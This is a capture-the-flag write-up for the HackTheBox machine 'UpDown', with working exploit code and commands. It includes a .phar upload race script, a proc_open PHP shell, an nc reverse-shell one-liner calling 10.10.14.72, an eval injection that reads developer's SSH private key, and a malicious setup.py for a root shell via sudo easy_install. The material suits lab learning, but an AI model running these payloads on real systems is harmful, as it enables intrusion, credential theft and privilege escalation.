CTF-Writeups/HackTheBox/UpDown.md
2023-02-10 17:29:37 +03:00


HackTheBox - Updown

NMAP

Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

The web page has a feature that checks whether a given site is up. It also reveals the domain name siteisup.htb, so let's add that to the hosts file.

With debug mode enabled, the page echoes the response body fetched from the URL we supply, which gives us a Server Side Request Forgery (SSRF).

I tried using the file protocol to read the local file file:///etc/passwd, but it was blocked.

Using the domain name, we can fuzz for subdomains (virtual hosts) with wfuzz, hiding the 1131-character response that the default vhost returns for unknown Host headers:

wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131

This finds the subdomain dev (dev.siteisup.htb), which answers with a 403 status code.

Since we have the SSRF, we can try reaching the dev site through the status check, so that the server makes the request for us.

But the checker reports it as down, so the dev site probably filters requests. Fuzzing the main site for files and directories instead turns up /dev, which returns a blank page.

Fuzzing inside /dev/ finds a .git directory.

We can download the whole .git directory with wget's --recursive option (directory listing is enabled there):

wget --recursive http://10.10.11.177/dev/.git/

After downloading, change into the directory that contains .git and run git checkout . to restore the working tree from the repository.

changelog.txt mentions that the upload option was removed.

The .htaccess file shows a custom header that must be present in every request; requests without it are denied.

I used a Burp extension called Add Custom Header so that the special header gets added to every request.

checker.php filters uploads by file extension, which is the spot that might let us upload a PHP file and get code execution.

It blocks all the usual PHP extensions except .phar. Even if we upload a .phar, the script reads the file, makes a request for each entry in it to check for a 200 status code, and deletes the file once it has finished.

To get code execution anyway, we include an entry pointing at a host that isn't reachable: the script hangs on that request until it times out, and during that window the uploaded file still exists on disk and can be requested directly.
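The race described above, written out as an added example (not code from the writeup or from the box). Everything box-specific here is an assumption that you replace with what you find in the .git dump: the vhost name, the upload path and form field, the name and value of the .htaccess header, and the path the uploaded file is served from. The payload's first line is PHP and its second line is a URL on 192.0.2.1 (RFC 5737 TEST-NET, never routable), which is what keeps checker.php blocked. simulate() stands in for the server so the race logic can be run offline.

```python
"""Win the race against checker.php's cleanup: upload in the background, poll for the file."""
import http.client
import threading
import time
import uuid

# Assumed values (not from the writeup); take the real ones from the .git dump.
HOST = "dev.siteisup.htb"
UPLOAD_PATH = "/"
FIELD = "file"                                                   # assumed form field name
REQUIRED_HEADER = ("X-Required-Header", "value-from-htaccess")  # assumed; see .htaccess
UPLOADED_PATH = "/uploads/shell.phar"                            # assumed storage location
SINK_URL = "http://192.0.2.1/"   # unroutable: the checker hangs on this line until timeout


def build_payload(php_code: str, sink_url: str = SINK_URL) -> str:
    """PHP first (executed when we request the .phar), then the URL the checker hangs on."""
    return f"{php_code}\n{sink_url}\n"


def build_multipart(field: str, filename: str, content: str):
    """Hand-rolled multipart/form-data body so only the standard library is needed."""
    boundary = uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        f"{content}\r\n"
        f"--{boundary}--\r\n"
    ).encode()
    return f"multipart/form-data; boundary={boundary}", body


def upload(content: str, timeout: float = 30.0) -> None:
    """POST the .phar; this call blocks while checker.php waits on the sink URL."""
    ctype, body = build_multipart(FIELD, "shell.phar", content)
    conn = http.client.HTTPConnection(HOST, timeout=timeout)
    headers = {"Content-Type": ctype, REQUIRED_HEADER[0]: REQUIRED_HEADER[1]}
    try:
        conn.request("POST", UPLOAD_PATH, body=body, headers=headers)
        conn.getresponse().read()
    except OSError:
        pass  # a timeout here is expected: the checker is stuck on the sink
    finally:
        conn.close()


def fetch_uploaded(path: str = UPLOADED_PATH, timeout: float = 5.0):
    """GET the uploaded file: 404 before it lands, 200 while it still exists."""
    conn = http.client.HTTPConnection(HOST, timeout=timeout)
    try:
        conn.request("GET", path, headers={REQUIRED_HEADER[0]: REQUIRED_HEADER[1]})
        resp = conn.getresponse()
        return resp.status, resp.read().decode(errors="replace")
    except OSError:
        return None, ""
    finally:
        conn.close()


def race(start_upload, fetch, deadline: float = 20.0, interval: float = 0.2):
    """Start the blocking upload in a thread and poll until the file answers 200."""
    threading.Thread(target=start_upload, daemon=True).start()
    end = time.monotonic() + deadline
    while time.monotonic() < end:
        status, body = fetch()
        if status == 200:
            return status, body
        time.sleep(interval)
    return None, ""


def simulate():
    """Offline stand-in for the box: the file exists only while the fake upload blocks."""
    present = threading.Event()

    def fake_upload():
        present.set()        # checker wrote the file and is now stuck on the sink
        time.sleep(0.5)
        present.clear()      # checker timed out and deleted the file

    def fake_fetch():
        # constructed response: what the PHP payload would print while the file exists
        return (200, "uid=33(www-data)") if present.is_set() else (404, "")

    return race(fake_upload, fake_fetch, deadline=3.0, interval=0.05)


if __name__ == "__main__":
    print(race(lambda: upload(build_payload("<?php phpinfo(); ?>")), fetch_uploaded))
```

Run it against the box with the assumed constants replaced; the polling interval matters more than the deadline, since the window is only as long as the checker's timeout on the sink URL.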

Foothold

From the output of phpinfo() we can see that most of the functions that could give command execution are in disable_functions. To find out which ones are still usable we can run this script against that list: https://github.com/teambi0s/dfunc-bypasser
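What dfunc-bypasser does for us, as an added example (not the tool's code and not the box's real list): pull disable_functions out of a phpinfo() page and diff it against the functions that hand a string to a shell or exec() a program. The phpinfo HTML snippet is constructed; phpinfo() prints settings as table rows with the name in a td of class "e" and the value in a td of class "v".

```python
"""Which command-execution functions survive PHP's disable_functions?"""
import re

# Direct command-execution primitives. Any of these missing from disable_functions
# is enough to run a command from an uploaded PHP file.
EXEC_FUNCTIONS = (
    "system", "exec", "shell_exec", "passthru", "popen", "proc_open", "pcntl_exec",
)

# Constructed sample: a typical hardened list with proc_open forgotten.
SAMPLE_PHPINFO = """
<tr><td class="e">disable_functions</td><td class="v">pcntl_alarm,pcntl_fork,pcntl_waitpid,
pcntl_wait,pcntl_exec,exec,passthru,shell_exec,system,popen,dl</td><td class="v">no value</td></tr>
"""


def parse_list(value: str) -> set:
    """disable_functions is a comma-separated list; whitespace and newlines are noise."""
    return {f.strip() for f in value.split(",") if f.strip()}


def disabled_from_phpinfo(html: str) -> set:
    """Extract the local disable_functions value from phpinfo() HTML output."""
    m = re.search(r'<td class="e">disable_functions</td>\s*<td class="v">(.*?)</td>', html, re.S)
    return parse_list(m.group(1)) if m else set()


def usable_exec_functions(disabled: set) -> list:
    """The execution primitives that are still callable, in the order we would try them."""
    return [f for f in EXEC_FUNCTIONS if f not in disabled]


if __name__ == "__main__":
    disabled = disabled_from_phpinfo(SAMPLE_PHPINFO)
    print("disabled:", len(disabled), "functions")
    print("still usable:", usable_exec_functions(disabled))
```

If you would rather not page through phpinfo(), an uploaded file containing `<?php echo ini_get('disable_functions'); ?>` returns the same list, and parse_list() handles it directly.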

proc_open is not on the list, so we can abuse it to get command execution (adapted from the PHP manual's example):

https://www.macs.hw.ac.uk/~hwloidl/docs/PHP/function.proc-open.html

<?php
// Upload this as e.g. shell.phar: .phar is the one PHP extension checker.php lets through.
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
// proc_open is not in disable_functions, so we can still spawn bash
$process = proc_open("bash", $descriptorspec, $pipes);
if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt

    // Feed the command to bash's stdin; closing the pipe sends EOF so bash exits afterwards
    fwrite($pipes[0], "id\n");
    fclose($pipes[0]);

    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);

    echo "command returned $return_value\n";
}
?>

After uploading the file and requesting it before the checker deletes it, we get the output of the id command.

Swapping the id command for the mkfifo/nc one-liner gives us a reverse shell to a listener on port 2222:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f

Privilege Escalation (developer)

In developer's home directory we find the siteisup binary together with its source code; the binary is SUID, so it runs as developer.

We can exploit this by feeding it a Python expression that imports the os module and executes the id command:

__import__('os').system('id')

From here we can read developer's SSH private key and log in as developer:

__import__('os').system('cat /home/developer/.ssh/id_rsa')
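Why that one-liner works, as an added example rather than the box's own script (the writeup shows the payload but not the source it ran against). The assumption, which is the only one under which `__import__('os').system('id')` does anything, is that the script passes the user-supplied string to eval(), or reads it with input() under Python 2, which is eval(raw_input()). vulnerable_check is that sink; hardened_check is the fix: treat the value as data, validate it as a URL, and never evaluate it.

```python
"""Input injection in a 'site is up' wrapper: evaluated input versus validated input."""
import re
from urllib.parse import urlparse

# Same shape as the writeup's payload, with a harmless call so it can be run anywhere.
PAYLOAD = "__import__('os').getpid()"


def vulnerable_check(user_input: str):
    # Assumed vulnerable sink: the string is evaluated as Python, so any expression runs
    # with the privileges of the SUID binary (developer on the box).
    return eval(user_input)


URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d{1,5})?(?:/[^\s]*)?")


def hardened_check(user_input: str) -> str:
    """Accept only something that looks like an http(s) URL and return it unevaluated."""
    if not URL_RE.fullmatch(user_input):
        raise ValueError("not a URL")
    parsed = urlparse(user_input)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise ValueError("not a URL")
    return user_input


def demo() -> dict:
    """Run the payload through both sinks and a legitimate URL through the hardened one."""
    results = {"vulnerable": vulnerable_check(PAYLOAD)}   # an int: the expression ran
    try:
        hardened_check(PAYLOAD)
        results["hardened"] = "accepted"
    except ValueError:
        results["hardened"] = "rejected"
    results["legit"] = hardened_check("http://siteisup.htb/")
    return results


if __name__ == "__main__":
    print(demo())
```

The SUID bit only makes this worse; the script itself is the bug, and it is exploitable by anyone who can run the binary, whatever it is setuid to.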

Privilege Escalation (root)

Running sudo -l shows that we can run /usr/local/bin/easy_install as root.

GTFOBins documents how to abuse this:

https://gtfobins.github.io/gtfobins/easy_install/
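The GTFOBins entry written out, as an added example (not the page's own code): easy_install "installs" whatever directory it is pointed at by running that directory's setup.py, so a setup.py that exec's a shell runs as root under sudo. The tty redirections keep the spawned shell attached to our terminal.

```python
"""Turn sudo easy_install into a root shell via a malicious setup.py."""
import os
import tempfile

# The setup.py easy_install will execute as root. execl replaces the Python process
# with /bin/sh, wired to our tty so the shell is interactive.
SETUP_PY = (
    "import os\n"
    "os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\n"
)


def write_payload(directory: str = None) -> str:
    """Create (or reuse) a directory holding the malicious setup.py; return its path."""
    directory = directory or tempfile.mkdtemp()
    with open(os.path.join(directory, "setup.py"), "w") as f:
        f.write(SETUP_PY)
    return directory


def easy_install_command(directory: str) -> str:
    """The exact sudo invocation permitted by sudo -l, pointed at our directory."""
    return f"sudo /usr/local/bin/easy_install {directory}"


if __name__ == "__main__":
    d = write_payload()
    print("now run:", easy_install_command(d))
```

Run the printed command as developer; the shell you land in is root's, because sudo ran easy_install, and easy_install ran setup.py, without ever dropping privileges.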